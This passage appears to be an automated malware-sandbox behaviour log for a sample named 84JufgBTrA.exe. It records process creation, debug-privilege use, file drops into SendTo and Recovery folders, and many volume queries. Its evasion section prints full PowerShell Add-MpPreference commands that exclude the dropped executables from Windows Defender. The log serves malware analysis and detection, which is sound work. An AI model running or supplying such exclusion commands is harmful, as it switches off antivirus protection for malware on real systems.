                      Source: C:\Users\user\Desktop\84JufgBTrA.exeFile opened: C:\Users\user\AppDataJump to behavior
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                      Source: w32tm.exe, 00000024.00000002.1852433190.000002219EA87000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Recovery\RuntimeBroker.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Recovery\RuntimeBroker.exeProcess token adjusted: Debug
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeProcess token adjusted: Debug
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeMemory allocated: page read and write | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Adds a directory exclusion to Windows Defender
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\crx\scripts\extension\MaEiPrsQRasQLtRzJjb.exe'
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\RuntimeBroker.exe'
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windowspowershell\Configuration\MaEiPrsQRasQLtRzJjb.exe'
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\SendTo\MaEiPrsQRasQLtRzJjb.exe'
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exe'
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\crx\scripts\extension\MaEiPrsQRasQLtRzJjb.exe'Jump to behavior
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\RuntimeBroker.exe'Jump to behavior
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\SendTo\MaEiPrsQRasQLtRzJjb.exe'Jump to behavior
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exe'Jump to behavior
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\b5tsyhrw\b5tsyhrw.cmdline"Jump to behavior
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\crx\scripts\extension\MaEiPrsQRasQLtRzJjb.exe'Jump to behavior
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\RuntimeBroker.exe'Jump to behavior
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\SendTo\MaEiPrsQRasQLtRzJjb.exe'Jump to behavior
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exe'Jump to behavior
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\OO0he60sKA.bat" Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC0BA.tmp" "c:\Windows\System32\CSCFD2815331994D75A9D1B7A464F57D19.TMP"Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe "C:\Users\user\SendTo\MaEiPrsQRasQLtRzJjb.exe"
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeQueries volume information: C:\Users\user\Desktop\84JufgBTrA.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe VolumeInformationJump to behavior
                      Source: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exe VolumeInformationJump to behavior
                      Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Recovery\RuntimeBroker.exe VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
